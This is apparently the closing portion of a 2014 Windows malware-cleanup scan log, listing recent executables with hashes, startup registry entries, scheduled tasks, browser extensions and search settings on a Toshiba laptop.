2014-10-29 22:50:15 E273331224005C5A8A504164373DE1DC 535304 ----a-w- C:\Program Files (x86)\ESET\ESET Online Scanner\OnlineScannerApp.exe

2014-10-29 22:50:15 9E47522861242EE002D7F385C35D1322 2887824 ----a-w- C:\Program Files (x86)\ESET\ESET Online Scanner\ESETSmartInstaller.exe

2014-10-29 22:50:15 5B3DE7968D23B476AFB256D8014B25B9 333424 ----a-w- C:\Program Files (x86)\ESET\ESET Online Scanner\OnlineCmdLineScannerA.exe

2014-10-29 22:50:15 47B06E473B78A792DF07D226E0537D63 119184 ----a-w- C:\Program Files (x86)\ESET\ESET Online Scanner\OnlineScannerUninstaller.exe

2014-10-29 22:50:15 3C3F35C91F230493B088B334E39D1F7A 358144 ----a-w- C:\Program Files (x86)\ESET\ESET Online Scanner\OnlineCmdLineScanner.exe

2014-10-29 22:49:53 E8D3E34FFDAF21DF7C09CBBBA5763237 2347384 ----a-w- C:\Users\ADH.Heathman-PC\Downloads\esetsmartinstaller_enu.exe

2014-10-29 17:09:36 DCC534F22A5A4B43E5123A772D3ECF5A 895568 ----a-w- C:\Program Files (x86)\Google\Update\Download\{4DC8B4CA-1BDA-483E-B5FA-D3C12E15B62D}\38.0.2125.111\38.0.2125.111_38.0.2125.104_chrome_updater.exe

2014-10-29 14:36:20 E5F8EC7A540C12704251C1655D187678 8192 ----a-w- C:\Users\ADH.Heathman-PC\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JWC22V15\installer_adobe_flash_player_English[1].exe

2014-10-29 14:35:33 6AD76FFDDA7E1F03BFC641B54DF8925C 8192 ----a-w- C:\Users\ADH.Heathman-PC\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OUWPNNBG\installer_adobe_flash_player_English[1].exe

2014-10-29 14:34:22 6964616C0D8B81B493C69ED9C0FC5DC6 8192 ----a-w- C:\Users\ADH.Heathman-PC\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XBAQWK47\installer_adobe_flash_player_English[1].exe

2014-10-29 13:07:36 4ADCFEE16EE9978F06157634669D36FB 602112 ----a-w- C:\Users\ADH.Heathman-PC\Desktop\OTL.exe

2014-10-29 12:08:37 F042EE4C8D66248D9B86DCF52ABAE416 256000 ----a-w- C:\Windows\PEV.exe

2014-10-29 12:08:37 5E832F4FAF5F481F2EAF3B3A48F603B8 68096 ----a-w- C:\Windows\zip.exe

2014-10-29 12:08:37 0277C027A26428DB64EF4F64F52BB4FD 208896 ----a-w- C:\Windows\MBR.exe

2014-10-29 12:08:36 9E05A9C264C8A908A8E79450FCBFF047 80412 ----a-w- C:\Windows\grep.exe

2014-10-29 12:08:36 0297C72529807322B152F517FDB0A9FC 406528 ----a-w- C:\Windows\SWSC.exe

2014-10-29 04:15:21 D38C4B9A4B1E3E64A1EDF8003E921DB2 1460 ----a-w- C:\Users\ADH.Heathman-PC\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\FZ3GCYUW\PCPerformerSetup[1].exe

2014-10-29 03:33:56 5DCED6B6A9BF0C12079E8F9513B3C8C1 4974864 ----a-w- C:\Users\Heathman\Downloads\ccsetup419.exe

2014-10-29 03:03:50 943C708E6C85202BB41BAAED958F2D07 2113024 ----a-w- C:\Users\ADH.Heathman-PC\Desktop\FRST64\FRST-OlderVersion\FRST64.exe

2014-10-29 03:03:50 80354F83C3D457FC5FB6CE1CF08835C1 2113536 ----a-w- C:\Users\ADH.Heathman-PC\Desktop\FRST64\FRST64.exe

2014-10-27 22:51:39 731BB89065411453860C48EEE348961E 120407800 ----a-w- C:\Users\ADH.Heathman-PC\Downloads\msert.exe

2014-10-25 19:00:01 821E577AB0B119278BD1940FEF224DDA 51080 ----atw- C:\Program Files (x86)\Google\Update\1.3.25.5\GoogleUpdateBroker.exe

2014-10-25 19:00:01 4067DC9EA0640485F1CF395427FD5E9B 51080 ----atw- C:\Program Files (x86)\Google\Update\1.3.25.5\GoogleUpdateOnDemand.exe

2014-10-25 18:59:50 27DC334376EE08A0962E6367E23D3CBA 880272 ----a-w- C:\Program Files (x86)\Google\Update\1.3.25.5\GoogleUpdateSetup.exe

2014-10-25 18:59:23 976D5F35A058340DA2C160CEC4063C4B 230792 ----atw- C:\Program Files (x86)\Google\Update\1.3.25.5\GoogleCrashHandler.exe

2014-10-25 18:59:23 26E37D5EAC3F1CF66587183AB348168C 114568 ----atw- C:\Program Files (x86)\Google\Update\1.3.25.5\GoogleUpdateComRegisterShell64.exe

2014-10-25 18:59:23 047556104954A72A2222FFF169166EEE 285064 ----atw- C:\Program Files (x86)\Google\Update\1.3.25.5\GoogleCrashHandler64.exe

2014-10-25 18:59:10 51508F0C2476177E50C31B0BBFBF1BDB 107912 ----atw- C:\Program Files (x86)\Google\Update\1.3.25.5\GoogleUpdate.exe

2014-10-25 18:59:06 27DC334376EE08A0962E6367E23D3CBA 880272 ----a-w- C:\Program Files (x86)\Google\Update\Download\{430FD4D0-B729-4F61-AA34-91526481799D}\1.3.25.5\GoogleUpdateSetup.exe

2014-10-24 23:18:04 77ED3BFE03113FB4A2D674BC62080521 424248 ----a-w- C:\ProgramData\NVIDIA\Updatus\Download\6694\updatus.19000563_RUNASUSER.exe

=== C: other files ==

2014-10-30 11:57:39 CE44A9D4918DCDC7CCCF5503BF4D7A3D 14130 ----a-w- C:\Program Files (x86)\Java\jre1.8.0_25\lib\deploy\ffjcext.zip

==== Startup Registry Enabled ======================

[HKEY_USERS\S-1-5-21-616022151-183045692-1389677156-1011\Software\Microsoft\Windows\CurrentVersion\Run]

"Sidebar"="%ProgramFiles%\Windows\Sidebar.exe /autoRun"

[HKEY_USERS\S-1-5-21-616022151-183045692-1389677156-1014\Software\Microsoft\Windows\CurrentVersion\Run]

"swg"="C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe"

[HKEY_USERS\S-1-5-21-616022151-183045692-1389677156-1011\Software\Microsoft\Windows\CurrentVersion\RunOnce]

"mctadmin"="C:\Windows\System32\mctadmin.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"SVPWUTIL"="C:\Program Files (x86)\TOSHIBA\Utilities\SVPWUTIL.exe SVPwUTIL"

"HWSetup"="C:\Program Files\TOSHIBA\Utilities\HWSetup.exe hwSetUP"

"KeNotify"="C:\Program Files (x86)\TOSHIBA\Utilities\KeNotify.exe LPCM"

"ToshibaServiceStation"="C:\Program Files (x86)\TOSHIBA\TOSHIBA Service Station\ToshibaServiceStation.exe /hide:60"

"ToshibaAppPlace"="C:\Program Files (x86)\Toshiba\Toshiba App Place\ToshibaAppPlace.exe"

"Samsung PanelMgr"="C:\windows\Samsung\PanelMgr\ssmmgr.exe /autorun"

"APSDaemon"="C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"

"iTunesHelper"="C:\Program Files (x86)\iTunes\iTunesHelper.exe"

"SunJavaUpdateSched"="C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"

"Adobe ARM"="C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]

"swg"="C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows]

"AppInit_DLLs"="C:\\Windows\\SysWOW64\\nvinit.dll"

==== Startup Registry Enabled x64 ======================

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"IgfxTray"="C:\windows\system32\igfxtray.exe"

"HotKeysCmds"="C:\windows\system32\hkcmd.exe"

"Persistence"="C:\windows\system32\igfxpers.exe"

"RtHDVCpl"="C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s"

"RtHDVBg"="C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe /FORPCEE3 /MAXX3 "

"IntelPAN"="C:\Program Files\Common Files\Intel\WirelessCommon\iFrmewrk.exe /tf Intel PAN Tray"

"TosVolRegulator"="C:\Program Files\TOSHIBA\TosVolRegulator\TosVolRegulator.exe"

"TPwrMain"="%ProgramFiles%\TOSHIBA\Power Saver\TPwrMain.EXE"

"HSON"="%ProgramFiles%\TOSHIBA\TBS\HSON.exe "

"TCrdMain"="%ProgramFiles%\TOSHIBA\FlashCards\TCrdMain.exe "

"SynTPEnh"="%ProgramFiles%\Synaptics\SynTP\SynTPEnh.exe "

"Teco"=""%ProgramFiles%\TOSHIBA\TECO\Teco.exe" /r"

"TosSENotify"="C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosWaitSrv.exe"

"TosWaitSrv"="%ProgramFiles%\TOSHIBA\TPHM\TosWaitSrv.exe "

"TosNC"="%ProgramFiles%\Toshiba\BulletinBoard\TosNcCore.exe "

"TosReelTimeMonitor"="%ProgramFiles%\TOSHIBA\ReelTime\TosReelTimeMonitor.exe "

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows]

"AppInit_DLLs"="C:\\Windows\\System32\\nvinitx.dll"

==== Startup Registry Disabled x64 ======================

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Adobe ARM]

"command"="\"C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeARM.exe\""

"hkey"="HKLM"

"item"="Adobe ARM"

"key"="SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Adobe Reader Speed Launcher]

"command"="\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\Reader_sl.exe\""

"hkey"="HKLM"

"item"="Adobe Reader Speed Launcher"

"key"="SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\iTunesHelper]

"command"="\"C:\\Program Files (x86)\\iTunes\\iTunesHelper.exe\""

"hkey"="HKLM"

"item"="iTunesHelper"

"key"="SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\QuickTime Task]

"command"="\"C:\\Program Files (x86)\\QuickTime\\QTTask.exe\" -atboottime"

"hkey"="HKLM"

"item"="QuickTime Task"

"key"="SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run"

==== Task Scheduler Jobs ======================

C:\windows\tasks\Adobe Flash Player Updater.job --a------ C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [09/23/2014 08:24 PM]

C:\windows\tasks\GoogleUpdateTaskMachineCore.job --a------ C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [10/25/2014 01:59 PM]

C:\windows\tasks\GoogleUpdateTaskMachineUA.job --a------ C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [10/25/2014 01:59 PM]

C:\windows\tasks\GoogleUpdateTaskUserS-1-5-21-616022151-183045692-1389677156-1002Core.job --a------ C:\Users\Heathman\AppData\Local\Google\Update\GoogleUpdate.exe [10/11/2012 08:07 PM]

C:\windows\tasks\GoogleUpdateTaskUserS-1-5-21-616022151-183045692-1389677156-1002UA.job --a------ C:\Users\Heathman\AppData\Local\Google\Update\GoogleUpdate.exe [10/11/2012 08:07 PM]

==== Other Scheduled Tasks ======================

"C:\windows\SysNative\tasks\Adobe Flash Player Updater" [C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe]

"C:\windows\SysNative\tasks\GoogleUpdateTaskMachineCore" [C:\Program Files (x86)\Google\Update\GoogleUpdate.exe]

"C:\windows\SysNative\tasks\GoogleUpdateTaskMachineUA" [C:\Program Files (x86)\Google\Update\GoogleUpdate.exe]

"C:\windows\SysNative\tasks\GoogleUpdateTaskUserS-1-5-21-616022151-183045692-1389677156-1002Core" [C:\Users\Heathman\AppData\Local\Google\Update\GoogleUpdate.exe]

"C:\windows\SysNative\tasks\GoogleUpdateTaskUserS-1-5-21-616022151-183045692-1389677156-1002UA" [C:\Users\Heathman\AppData\Local\Google\Update\GoogleUpdate.exe]

"C:\windows\SysNative\tasks\IHSelfDeleteTASK" [CMD]

"C:\windows\SysNative\tasks\IHUninstallTrackingTASK" [CMD]

"C:\windows\SysNative\tasks\MotoCast Update" ["C:\Program Files (x86)\Motorola Mobility\MotoCast\LiveUpdate\MotoCastUpdate.exe"]

"C:\windows\SysNative\tasks\Motorola Device Manager Engine" ["C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotorolaDeviceManagerUpdate.exe"]

"C:\windows\SysNative\tasks\Motorola Device Manager Initial Update" ["C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotorolaDeviceManagerUpdate.exe"]

"C:\windows\SysNative\tasks\Motorola Device Manager Update" ["C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotorolaDeviceManagerUpdate.exe"]

"C:\windows\SysNative\tasks\Norton WSC Integration" ["C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\WSCStub.exe"]

"C:\windows\SysNative\tasks\TOSHIBA Wireless Display Monitor" [C:\Program Files (x86)\TOSHIBA\widimon\widimon.exe]

"C:\windows\SysNative\tasks\User_Feed_Synchronization-{33596801-E64F-4DCE-B487-9E9DBE9DB15C}" [C:\windows\system32\msfeedssync.exe]

"C:\windows\SysNative\tasks\{E61DD5E1-BD52-2A9D-750F-258FE7FE9D61}" [C:\windows\system32\regsvr32.exe]

"C:\windows\SysNative\tasks\Apple\AppleSoftwareUpdate" [C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe]

"C:\windows\SysNative\tasks\Norton 360\Norton Error Analyzer" [C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\SymErr.exe]

"C:\windows\SysNative\tasks\Norton 360\Norton Error Processor" [C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\SymErr.exe]

"C:\windows\SysNative\tasks\OfficeSoftwareProtectionPlatform\SvcRestartTask" [%systemroot%\system32\sc.exe start osppsvc]

==== Firefox Extensions Registry ======================

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Mozilla\Firefox\Extensions]

"{2D3F3651-74B9-4795-BDEC-6DA2F431CB62}"="C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.6.0.32\coFFPlgn" [10/30/2014 06:45 AM]

==== Firefox Extensions ======================

ProfilePath: C:\Users\Heathman\AppData\Roaming\TomTom\HOME\Profiles\45jhtpov.default

- Map status indicator - C:\Program Files (x86)\TomTom HOME 2\xul\extensions\MapShare-status@tomtom.com

- TomTom HOME default theme - C:\Program Files (x86)\TomTom HOME 2\xul\extensions\baseTheme@tomtom.com

- Emulator - %ProfilePath%\extensions\Navcore.8.010.9369@tomtom.com

==== Firefox Plugins ======================

==== Chromium Look ======================

HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\Extensions

iikflkcanblccfahdhdonehdalibjnif - No path found[]

mkfokfffehpeedafpekjeddnmnjhmcmk - C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\Exts\Chrome.crx[09/20/2014 03:52 AM]

Google Slides - ADH.Heathman-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek

Google Docs - ADH.Heathman-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake

Google Drive - ADH.Heathman-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf

YouTube - ADH.Heathman-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo

Google Search - ADH.Heathman-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf

Google Sheets - ADH.Heathman-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap

Norton Identity Safe - ADH.Heathman-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\iikflkcanblccfahdhdonehdalibjnif

Norton Security Toolbar - ADH.Heathman-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\mkfokfffehpeedafpekjeddnmnjhmcmk

Google Wallet - ADH.Heathman-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda

Gmail - ADH.Heathman-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia

Google Slides - ADH~1.HEA\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek

Google Docs - ADH~1.HEA\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake

Google Drive - ADH~1.HEA\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf

YouTube - ADH~1.HEA\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo

Google Search - ADH~1.HEA\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf

Google Sheets - ADH~1.HEA\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap

Norton Identity Safe - ADH~1.HEA\AppData\Local\Google\Chrome\User Data\Default\Extensions\iikflkcanblccfahdhdonehdalibjnif

Norton Security Toolbar - ADH~1.HEA\AppData\Local\Google\Chrome\User Data\Default\Extensions\mkfokfffehpeedafpekjeddnmnjhmcmk

Google Wallet - ADH~1.HEA\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda

Gmail - ADH~1.HEA\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia

==== IE Start and Search Settings ======================

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]

"Start Page"="http://start.toshiba.com/"

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]

"DefaultScope"="{2C284C26-5B06-4DFC-B46C-9D2EA294202A}"

==== All HKCU SearchScopes ======================

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes

{0633EE93-D776-472f-A0FF-E1416B8B2E3A} Bing Url="http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02"

{2C284C26-5B06-4DFC-B46C-9D2EA294202A} Bing Url="http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02"

{2D1389C8-B7A4-42B3-9385-7287A26C0DF5} Google Url="http://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP_enUS476"

{3F69DA71-DC06-4D09-BEF6-BC86B2EA700C} Unknown Url="Not_Found"

{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} Norton Safe Search Url="http://nortonsafe.search.ask.com/web?q={SEARCHTERMS}&o=APN10506&l=dis&prt=360&chn=retail&geo=US&ver=21&locale=en_US&gct=kwd&qsrc=2869"

{C6375EBC-5C3D-4491-AADA-B48CB13B0238} Google Url="http://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP"

==== C:\zoek_backup content ======================

C:\zoek_backup (files=0 folders=0 0 bytes)

==== EOF on Thu 10/30/2014 at 7:14:54.06 ======================
